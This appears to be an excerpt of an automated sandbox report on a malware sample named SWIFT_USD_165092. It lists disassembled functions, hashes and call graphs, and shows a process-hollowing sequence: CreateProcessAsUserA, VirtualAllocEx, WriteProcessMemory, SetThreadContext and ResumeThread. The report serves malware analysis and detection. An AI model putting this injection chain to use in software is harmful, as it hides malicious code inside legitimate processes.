                                                                                        • Instruction ID: eeaa9c3457948afd4d044dd9a05966e12aa6dfacf5251e0ae1bf75d1740a51d5
                                                                                        • Opcode Fuzzy Hash: f825cc49a36603e58b05d30dbcded4ff69a659c0c942629433790640a090c2f4
                                                                                        • Instruction Fuzzy Hash: 93119075504380DFDB06CF14D9C4B15BBB2FB94328F28C6ADD8494BA56C33AD85ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B40E50 Relevance: .0, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0b8bf9f05d17d0bdb347021a494e624017e3077f3b9363b4457099fa1dd6b002
                                                                                        • Instruction ID: 46b1a0e62ae6e680e429b2d4bad2c292fee3b0a4406780d3cf60d79cad29ffe9
                                                                                        • Opcode Fuzzy Hash: 0b8bf9f05d17d0bdb347021a494e624017e3077f3b9363b4457099fa1dd6b002
                                                                                        • Instruction Fuzzy Hash: F91102386146188FC751EB24D684D69B7EAFB88314B14C89ED9498B722CB32F847DF80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D1D9C1 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523172169.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d1d000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d73237e471fe79ac7398c436fa3e6a14cc166a52892f9464abccc8c7344086f6
                                                                                        • Instruction ID: 2e869d8ebb13b43ac9a01452f6b42489d1f366a84796b3a939433d0ae082646b
                                                                                        • Opcode Fuzzy Hash: d73237e471fe79ac7398c436fa3e6a14cc166a52892f9464abccc8c7344086f6
                                                                                        • Instruction Fuzzy Hash: 3B01F772508384BEE7108E15EC847A6BFD8EF51730F18811AED451E242CB78EC80DAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D1D9C0 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523172169.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d1d000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 621e1b91860f61566cf05543be5330a97d5d444e4adc0f660e9284bb09a44761
                                                                                        • Instruction ID: ead485e80d6a696b8dac98f1ca460fa30df75e6f46658544afd8ecba1d36e259
                                                                                        • Opcode Fuzzy Hash: 621e1b91860f61566cf05543be5330a97d5d444e4adc0f660e9284bb09a44761
                                                                                        • Instruction Fuzzy Hash: 3DF06872544344AEE7108A15DD84762FFD8EF91734F18C55AED045F246C7749C84CAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B41530 Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3176f76a3b5178d50bb2fb78170327d9da517e149dc08357df451210d3de30ab
                                                                                        • Instruction ID: 384d2b4bdbf9597e8a79542763785c7cf21ed74b7da1ddbaff035bc9b8b037a3
                                                                                        • Opcode Fuzzy Hash: 3176f76a3b5178d50bb2fb78170327d9da517e149dc08357df451210d3de30ab
                                                                                        • Instruction Fuzzy Hash: F9C092342A0208CFC648DF59D484C5073ACFF48A1936100D9E9098B732CB32FC02CA90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 06B41550 Relevance: .0, Instructions: 8COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
                                                                                        • Instruction ID: 6a22517867a3a53444424914dfac3ff35bd0c12d595d8faada3baf711c878536
                                                                                        • Opcode Fuzzy Hash: e19a36b643ecad74ab8e3884951d356b47645254dcee1533935bc1b8b6e3558e
                                                                                        • Instruction Fuzzy Hash: 88C048342A02088F8204DB59D484C5033A8AF48A2935100D8E5098B732CB22FC52CA80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 06B43A68 Relevance: .3, Instructions: 333COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d150173dd814fe633a3b0c4181febc72c505ed19f5d0407b215f9066b9cb7915
                                                                                        • Instruction ID: f3c144079a35a52db404becc44406e13c3f86dff10e35e47bacd686306cf28e5
                                                                                        • Opcode Fuzzy Hash: d150173dd814fe633a3b0c4181febc72c505ed19f5d0407b215f9066b9cb7915
                                                                                        • Instruction Fuzzy Hash: 01C1F6B1B006468FCB54EE2AC4C076EBBE2DB91309F2CC57DD46687346CA30E846CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D76CC8 Relevance: .2, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3955a469a57925861396546678e397d7feb95974ff273d7ecae3e197b48a53b3
                                                                                        • Instruction ID: 093ac23d09ede722316aa50ae4a24bf85f94e0e5d9a3191afc9ba46b1a72ed9f
                                                                                        • Opcode Fuzzy Hash: 3955a469a57925861396546678e397d7feb95974ff273d7ecae3e197b48a53b3
                                                                                        • Instruction Fuzzy Hash: EB914A70E00609CFDB14CFA9D9857DEBBF2AF88704F18C129E419A7254FB749885CBA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7B4C8 Relevance: .1, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3ae1648baf5b4119408b2d39523df66e2551ea8fdcec4e4c48957481f9836803
                                                                                        • Instruction ID: 58f0db5c3c78cfb0989581a1cd0f39e4df3529b8bfda06de8c3491c5cb92df0c
                                                                                        • Opcode Fuzzy Hash: 3ae1648baf5b4119408b2d39523df66e2551ea8fdcec4e4c48957481f9836803
                                                                                        • Instruction Fuzzy Hash: D311BF5210C5C14BE313973808352DABFA19E87A6CB2C07CEC1EA491E3D2038887E316
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:23%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:75
                                                                                        Total number of Limit Nodes:2
                                                                                        execution_graph 3742 5a60448 3743 5a6044e 3742->3743 3744 5a60458 3743->3744 3747 5a61ef7 3743->3747 3752 5a61eb8 3743->3752 3749 5a61f02 3747->3749 3748 5a61f32 3748->3744 3758 5a63668 3749->3758 3762 5a63658 3749->3762 3753 5a61ec6 3752->3753 3755 5a61f18 3752->3755 3753->3753 3754 5a61f32 3754->3744 3756 5a63668 12 API calls 3755->3756 3757 5a63658 12 API calls 3755->3757 3756->3754 3757->3754 3759 5a63679 3758->3759 3760 5a6368b 3759->3760 3766 5a649ac 3759->3766 3760->3748 3763 5a63668 3762->3763 3764 5a6368b 3763->3764 3765 5a649ac 12 API calls 3763->3765 3764->3748 3765->3763 3767 5a649b7 3766->3767 3768 5a64aea 3767->3768 3798 5a65014 3767->3798 3802 5a65020 3767->3802 3776 5a64dd9 3768->3776 3806 5a65510 3768->3806 3810 5a65518 3768->3810 3769 5a64e30 3828 5a657e8 3769->3828 3831 5a657e0 3769->3831 3770 5a64e58 3770->3759 3771 5a64bc6 3813 5a65600 3771->3813 3817 5a65608 3771->3817 3772 5a64c3d 3773 5a64c7f 3772->3773 3790 5a65600 VirtualAllocEx 3772->3790 3791 5a65608 VirtualAllocEx 3772->3791 3773->3776 3820 5a656b0 3773->3820 3824 5a656a8 3773->3824 3774 5a64ca8 3775 5a64d98 3774->3775 3780 5a656b0 WriteProcessMemory 3774->3780 3781 5a656a8 WriteProcessMemory 3774->3781 3784 5a656b0 WriteProcessMemory 3775->3784 3785 5a656a8 WriteProcessMemory 3775->3785 3777 5a64e13 3776->3777 3835 5a65450 3776->3835 3839 5a65458 3776->3839 3777->3769 3788 5a65450 SetThreadContext 3777->3788 3789 5a65458 SetThreadContext 3777->3789 3780->3774 3781->3774 3784->3776 3785->3776 3788->3769 3789->3769 3790->3773 3791->3773 3799 5a650ad CreateProcessAsUserA 3798->3799 3801 5a652c8 3799->3801 3803 5a650ad CreateProcessAsUserA 3802->3803 3805 5a652c8 3803->3805 3807 5a65518 ReadProcessMemory 3806->3807 3809 5a6559d 3807->3809 3809->3771 3811 5a65560 ReadProcessMemory 3810->3811 3812 5a6559d 3811->3812 3812->3771 3814 5a65608 VirtualAllocEx 3813->3814 3816 5a65682 3814->3816 3816->3772 3818 5a6564b VirtualAllocEx 3817->3818 3819 5a65682 3818->3819 3819->3772 3821 5a656fb WriteProcessMemory 3820->3821 3823 5a6574c 3821->3823 3823->3774 3825 5a656b0 WriteProcessMemory 3824->3825 3827 5a6574c 3825->3827 3827->3774 3829 5a65829 ResumeThread 3828->3829 3830 5a65856 3829->3830 3830->3770 3832 5a657e8 ResumeThread 3831->3832 3834 5a65856 3832->3834 3834->3770 3836 5a65458 SetThreadContext 3835->3836 3838 5a654de 3836->3838 3838->3777 3840 5a654a0 SetThreadContext 3839->3840 3842 5a654de 3840->3842 3842->3777

                                                                                        Executed Functions

                                                                                        Function 05A65014 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 264processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 5a65014-5a650b9 2 5a6510d-5a6512f 0->2 3 5a650bb-5a650e0 0->3 6 5a65186-5a651b6 2->6 7 5a65131-5a65159 2->7 3->2 8 5a650e2-5a650e4 3->8 17 5a6520a-5a652c6 CreateProcessAsUserA 6->17 18 5a651b8-5a651dd 6->18 7->6 15 5a6515b-5a6515d 7->15 9 5a650e6-5a650f0 8->9 10 5a65107-5a6510a 8->10 12 5a650f4-5a65103 9->12 13 5a650f2 9->13 10->2 12->12 16 5a65105 12->16 13->12 19 5a65180-5a65183 15->19 20 5a6515f-5a65169 15->20 16->10 32 5a652cf-5a65343 17->32 33 5a652c8-5a652ce 17->33 18->17 26 5a651df-5a651e1 18->26 19->6 21 5a6516d-5a6517c 20->21 22 5a6516b 20->22 21->21 25 5a6517e 21->25 22->21 25->19 27 5a65204-5a65207 26->27 28 5a651e3-5a651ed 26->28 27->17 30 5a651f1-5a65200 28->30 31 5a651ef 28->31 30->30 34 5a65202 30->34 31->30 42 5a65345-5a65349 32->42 43 5a65353-5a65357 32->43 33->32 34->27 42->43 44 5a6534b 42->44 45 5a65367-5a6536b 43->45 46 5a65359-5a6535d 43->46 44->43 47 5a6536d-5a65371 45->47 48 5a6537b-5a6537f 45->48 46->45 49 5a6535f 46->49 47->48 50 5a65373 47->50 51 5a65391-5a65398 48->51 52 5a65381-5a65387 48->52 49->45 50->48 53 5a653af 51->53 54 5a6539a-5a653a9 51->54 52->51 56 5a653b0 53->56 54->53 56->56
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05A652B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID: uyQ$uyQ
                                                                                        • API String ID: 2217836671-669395725
                                                                                        • Opcode ID: b89dfe4f4368dfb4b7a682572db69d05f28485bddf4021c725dad805088798e0
                                                                                        • Instruction ID: f2508c46563c9ccc29439ceaf7461d34940af09dec4007a6a36393a80f9a8f31
                                                                                        • Opcode Fuzzy Hash: b89dfe4f4368dfb4b7a682572db69d05f28485bddf4021c725dad805088798e0
                                                                                        • Instruction Fuzzy Hash: D6A15C71E002199FDB10DFA9C885BDDBBF2FF48304F4481A9E869A7290E7749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A65020 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 262processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 57 5a65020-5a650b9 59 5a6510d-5a6512f 57->59 60 5a650bb-5a650e0 57->60 63 5a65186-5a651b6 59->63 64 5a65131-5a65159 59->64 60->59 65 5a650e2-5a650e4 60->65 74 5a6520a-5a652c6 CreateProcessAsUserA 63->74 75 5a651b8-5a651dd 63->75 64->63 72 5a6515b-5a6515d 64->72 66 5a650e6-5a650f0 65->66 67 5a65107-5a6510a 65->67 69 5a650f4-5a65103 66->69 70 5a650f2 66->70 67->59 69->69 73 5a65105 69->73 70->69 76 5a65180-5a65183 72->76 77 5a6515f-5a65169 72->77 73->67 89 5a652cf-5a65343 74->89 90 5a652c8-5a652ce 74->90 75->74 83 5a651df-5a651e1 75->83 76->63 78 5a6516d-5a6517c 77->78 79 5a6516b 77->79 78->78 82 5a6517e 78->82 79->78 82->76 84 5a65204-5a65207 83->84 85 5a651e3-5a651ed 83->85 84->74 87 5a651f1-5a65200 85->87 88 5a651ef 85->88 87->87 91 5a65202 87->91 88->87 99 5a65345-5a65349 89->99 100 5a65353-5a65357 89->100 90->89 91->84 99->100 101 5a6534b 99->101 102 5a65367-5a6536b 100->102 103 5a65359-5a6535d 100->103 101->100 104 5a6536d-5a65371 102->104 105 5a6537b-5a6537f 102->105 103->102 106 5a6535f 103->106 104->105 107 5a65373 104->107 108 5a65391-5a65398 105->108 109 5a65381-5a65387 105->109 106->102 107->105 110 5a653af 108->110 111 5a6539a-5a653a9 108->111 109->108 113 5a653b0 110->113 111->110 113->113
                                                                                        APIs
                                                                                        • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05A652B3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessUser
                                                                                        • String ID: uyQ$uyQ
                                                                                        • API String ID: 2217836671-669395725
                                                                                        • Opcode ID: 3d8b97baa9907c67e595f38b2d0a00ea5991f9020a94e947c00179e5011fe757
                                                                                        • Instruction ID: 515b7ed1ad1cac7ab87d3c8b8c6758c6d0bf60c2f55d2f0f5e0696278c99a9d4
                                                                                        • Opcode Fuzzy Hash: 3d8b97baa9907c67e595f38b2d0a00ea5991f9020a94e947c00179e5011fe757
                                                                                        • Instruction Fuzzy Hash: CAA16C71E002199FDB10DFA9C845BDDBBF2FF48704F4481A9E829A7290EB749985CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A656A8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 114 5a656a8-5a65701 117 5a65703-5a6570f 114->117 118 5a65711-5a6574a WriteProcessMemory 114->118 117->118 119 5a65753-5a65774 118->119 120 5a6574c-5a65752 118->120 120->119
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05A6573D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 3559483778-426589555
                                                                                        • Opcode ID: 981bf717698821d40ba24df18954afaa07064680296734abe3d48e57dba277d3
                                                                                        • Instruction ID: 5b4cc972f064439912adbc8966d668b83c23c3a556228651c81f71348f8282df
                                                                                        • Opcode Fuzzy Hash: 981bf717698821d40ba24df18954afaa07064680296734abe3d48e57dba277d3
                                                                                        • Instruction Fuzzy Hash: 5C21E5B5D00249DFCB10CFAAD885BDEBBF4FB48310F54842AE919A7250D778A944CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A656B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 122 5a656b0-5a65701 124 5a65703-5a6570f 122->124 125 5a65711-5a6574a WriteProcessMemory 122->125 124->125 126 5a65753-5a65774 125->126 127 5a6574c-5a65752 125->127 127->126
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05A6573D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 3559483778-426589555
                                                                                        • Opcode ID: a1a8cadc1620647534b22252c66312f32cc4c3576eba15e334d834a47ba6115c
                                                                                        • Instruction ID: 9b3656ead3651e0959cc75f9cb8bb77f5dd8b52198d2664051b242547faadaec
                                                                                        • Opcode Fuzzy Hash: a1a8cadc1620647534b22252c66312f32cc4c3576eba15e334d834a47ba6115c
                                                                                        • Instruction Fuzzy Hash: FC21E4B5D00249DFCB10CF9AD884BDEBBF4FB48310F50842AE919A7250D778A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A65450 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 129 5a65450-5a654a4 132 5a654a6-5a654ae 129->132 133 5a654b0-5a654dc SetThreadContext 129->133 132->133 134 5a654e5-5a65506 133->134 135 5a654de-5a654e4 133->135 135->134
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 05A654CF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 1591575202-426589555
                                                                                        • Opcode ID: 3c3aaa09c43b6617741df04015122512337b6c190a4d0b50e69994f986647847
                                                                                        • Instruction ID: ae9c272d448bd2b83b86762cb9a876a8d3494bdef52ba01e55919b69ebf4fded
                                                                                        • Opcode Fuzzy Hash: 3c3aaa09c43b6617741df04015122512337b6c190a4d0b50e69994f986647847
                                                                                        • Instruction Fuzzy Hash: 252127B1D0061A9FCB10CF9AC985BDEFBF4BB48320F548169E418B3640D778A9448FA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A65510 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 137 5a65510-5a6559b ReadProcessMemory 140 5a655a4-5a655c5 137->140 141 5a6559d-5a655a3 137->141 141->140
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A6558E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 1726664587-426589555
                                                                                        • Opcode ID: 3b650a1eade7a40355222d491ab67a8e93c9e37949a7b749a52f93e088b352af
                                                                                        • Instruction ID: c7177f4ba480f452e3b3ef2c31b63efe466e380794a624651bc6d3fe9cd8e8f0
                                                                                        • Opcode Fuzzy Hash: 3b650a1eade7a40355222d491ab67a8e93c9e37949a7b749a52f93e088b352af
                                                                                        • Instruction Fuzzy Hash: 392108B6D006499FCB10CF9AC884BDEBBF4FF48320F548429E459A7250D778A544DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A65458 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58threadinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 143 5a65458-5a654a4 145 5a654a6-5a654ae 143->145 146 5a654b0-5a654dc SetThreadContext 143->146 145->146 147 5a654e5-5a65506 146->147 148 5a654de-5a654e4 146->148 148->147
                                                                                        APIs
                                                                                        • SetThreadContext.KERNELBASE(?,00000000), ref: 05A654CF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThread
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 1591575202-426589555
                                                                                        • Opcode ID: 8f7aad18914c1f57676bc0bd5d3fc01a61bc274f7f593a1311b41d2749b86fa0
                                                                                        • Instruction ID: c3c3f1a3a2a6354cedd171e164f67ab499e885d7acddd6df4b9d5d25ba1c9435
                                                                                        • Opcode Fuzzy Hash: 8f7aad18914c1f57676bc0bd5d3fc01a61bc274f7f593a1311b41d2749b86fa0
                                                                                        • Instruction Fuzzy Hash: 292106B1D0061A9FCB10CF9AC984BDEFBF4BB48720F54816AD518B7640D778A9448FA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A65518 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 150 5a65518-5a6559b ReadProcessMemory 152 5a655a4-5a655c5 150->152 153 5a6559d-5a655a3 150->153 153->152
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A6558E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 1726664587-426589555
                                                                                        • Opcode ID: a4a231d6bdf210c1cd380f73af459b1cbc89856840f9fe6e99b6bf7455a54d31
                                                                                        • Instruction ID: e8c91a76b336355ec8278340c8ab9cd155e7a9b08eb3515afddfc50b26a7ed72
                                                                                        • Opcode Fuzzy Hash: a4a231d6bdf210c1cd380f73af459b1cbc89856840f9fe6e99b6bf7455a54d31
                                                                                        • Instruction Fuzzy Hash: C52106B5D002499FCB10CF9AC884BDEBBF4FF48320F508429E459A7250D378A644DFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A65600 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 155 5a65600-5a65680 VirtualAllocEx 158 5a65682-5a65688 155->158 159 5a65689-5a6569d 155->159 158->159
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A65673
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 4275171209-426589555
                                                                                        • Opcode ID: 3a9b0a780561986fd9d481a1df63c2bd0236594377640575756aa8bc0960e2ae
                                                                                        • Instruction ID: 7bbc09b380aadae582a9d682396955bb6560a6c4d11d935ecbd3ff055f68165d
                                                                                        • Opcode Fuzzy Hash: 3a9b0a780561986fd9d481a1df63c2bd0236594377640575756aa8bc0960e2ae
                                                                                        • Instruction Fuzzy Hash: F71125BA8006499FCB10CF9AC884BDEBFF4FB48320F148459E529A7210C375A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 05A65608 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48memoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 161 5a65608-5a65680 VirtualAllocEx 163 5a65682-5a65688 161->163 164 5a65689-5a6569d 161->164 163->164
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A65673
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 4275171209-426589555
                                                                                        • Opcode ID: 69cfe1a343c970e7dfa617c18c587fcfd32cd9e63b9001d03881a4e0560e52a2
                                                                                        • Instruction ID: eb89ef7b9d63cb9e5bb351548d1b86f510ddb0466720688b816281a8a244d07c
                                                                                        • Opcode Fuzzy Hash: 69cfe1a343c970e7dfa617c18c587fcfd32cd9e63b9001d03881a4e0560e52a2
                                                                                        • Instruction Fuzzy Hash: 111122B58002499FCB10CF9AC884BDEBFF4FB48320F248429E529A7210C375A944CFA5
                                                                                        Uniqueness

